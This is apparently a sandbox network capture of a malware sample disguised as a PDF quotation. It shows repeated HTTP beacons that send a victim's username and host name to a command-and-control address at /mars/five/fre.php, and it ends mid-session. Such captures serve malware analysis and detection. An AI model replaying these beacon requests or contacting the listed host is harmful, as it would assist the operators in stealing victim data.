                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.44974594.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:08.969996929 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:08.974834919 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:09.731591940 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:09 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.44974694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:10.068161011 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:10.073415041 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:10.792685986 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:10 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.44974794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:11.218591928 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:11.223372936 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:11.917833090 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:11 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.44974994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:12.112540960 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:12.117367983 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:12.853677034 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:12 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.44975194.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:12.999502897 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:13.004316092 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:13.756208897 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:13 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.2.44975494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:13.924335957 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:13.932697058 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:14.646960020 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:14 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.2.44975694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:14.800632954 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:14.805464983 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:15.593087912 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:15 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.2.44975894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:15.764664888 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:15.769592047 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:16.533528090 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:16 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.2.44975994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:16.689625978 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:16.694494009 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:17.444952011 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:17 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.44976094.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:17.616255999 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:17.621098995 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:18.365715981 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:18 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.44976194.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:18.519838095 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:18.524599075 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:19.255095005 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:19 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.44976294.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:19.408777952 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:19.413561106 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:20.161349058 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:20 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    20192.168.2.44976394.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:20.314740896 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:20.319720030 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:21.055150032 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:20 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    21192.168.2.44976494.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:21.203125954 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:21.208839893 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:21.994616032 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:21 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    22192.168.2.44976594.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:22.185805082 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:22.190721035 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:22.906075954 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:22 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    23192.168.2.44976694.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:23.078553915 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:23.083462000 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:23.819855928 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:23 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    24192.168.2.44976794.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:23.969023943 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:23.973870039 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:24.698086023 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:24 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    25192.168.2.44976894.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:24.875807047 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
                                                                                    Jan 7, 2025 12:32:24.880635977 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                    Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                                                                                    Jan 7, 2025 12:32:25.606833935 CET193INHTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.1
                                                                                    Date: Tue, 07 Jan 2025 11:32:25 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Connection: close
                                                                                    X-Powered-By: PHP/5.4.16
                                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                    Data Ascii: File not found.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    26192.168.2.44976994.156.177.41807772C:\Users\user\Desktop\Quotation2025-0107pdf.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Jan 7, 2025 12:32:25.824960947 CET243OUTPOST /mars/five/fre.php HTTP/1.0
                                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                    Host: 94.156.177.41
                                                                                    Accept: */*
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Encoding: binary
                                                                                    Content-Key: 715C4138
                                                                                    Content-Length: 149
                                                                                    Connection: close
